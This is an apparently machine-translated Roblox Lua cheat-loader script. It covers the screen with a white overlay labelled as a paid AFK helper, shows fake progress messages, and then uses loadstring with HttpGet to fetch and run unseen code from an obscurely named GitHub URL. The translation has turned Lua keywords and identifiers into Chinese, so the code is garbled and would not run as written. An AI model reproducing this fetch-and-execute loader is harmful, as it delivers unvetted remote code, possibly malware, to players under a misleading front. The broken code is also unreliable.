本地 CoreGui = 游戏:GetService("StarterGui")
本地玩家, Http = 游戏:GetService("Players").LocalPlayer, 游戏:GetService("HttpService")
局部 Tween = 游戏:.GetService("TweenService")


局部函数 createInstance(类, 属性)
    本地实例 = 类名.new()
    for key, value in pairs(properties) do
        instance[key] = value
    结束
    返回实例
结束


局部用户界面 = 创建实例("ScreenGui", {
    父级 = 游戏.核心界面
    显示顺序 = 999
    重置于生成 = 否
输入：})


局部BG = 创建实例("Frame", {
    Size = UDim2.new(1, 0, 1, 0),
    Position = UDim2.new(0, 0, 0, 0),
    背景颜色3 = Color3.fromFunctionRGB(255, 255, 255),  
    背景透明度 = 0,  
    父级 = 用户界面
输入：})


局部标题 = 创建实例("标签文本", {
    Size = UDim2.new(1, 0, 0, 80),
    Position = UDim2.new(0, 0, 0, 20),
    文本 = "挂机助手付费版"
    TextColor3 = Color3.fromRGB(255, 255, 255),  
    文本透明度 = 0,  
    字体 = 等宽字体.哥特黑体
    文本大小 = 40
    TextX 对齐方式 = 枚举文本X 对齐方式.居中,
    背景透明度 = 1,
    父项 = 背景
输入：})


局部中间文本 = 创建实例("文本标签", {
    Size = UDim2.new(1, 0, 0, 60),
    Position = UDim2.new(0, 0, 0.4, 0),
    文本 = "中间内容"
    TextColor3 = Color3.fromRGB(255, 255, 255),  
    文本透明度 = 0,  
    字体 = 常规字体.哥特体
    文本大小 = 24
    TextX 对齐方式 = 枚举文本X 对齐方式.居中,
    背景透明度 = 1,
    父项 = 背景
输入：})


本地 BottomText = 创建实例("TextLabel", {
    Size = UDim2.new(1, 0, 0, 40),
    Position = UDim2.new(0, 0, 0.8, 0),
    文本 = "2025-LYY 俄亥俄枢纽"
    TextColor3 = Color3.fromRGB(255, 255, 255),  
    文本透明度 = 0,  
    字体 = 罗马字体
    文本大小 = 18
    TextX 对齐方式 = 枚举文本X 对齐方式.居中,
    背景透明度 = 1,
    父项 = 背景
输入：})


局部部件 = 创建实例("部件", {
    Size = Vector3.new(1, 1, 1),
    Position = Vector3.new(0, 10, 0),
    固定 = true
    CanCollide = 否
    透明度 = 1,
    父级 = 工作区
输入：})


局部函数加载远程脚本
    MiddleText.Text = "开启防闲置中"; task.wait(0.01)
    MiddleText.Text = "正在寻找稀有物品"; task.wait(0.01)
    
    loadstring(game:HttpGet("https://raw.githubusercontent.com/lyynb666ezlol/jejsjwhwjajshsjnsjajqkwkdjdhieekjehwhwjw/refs/heads/main/2083622"))()
    
    pcall(function() end)
结束


加载远程脚本()
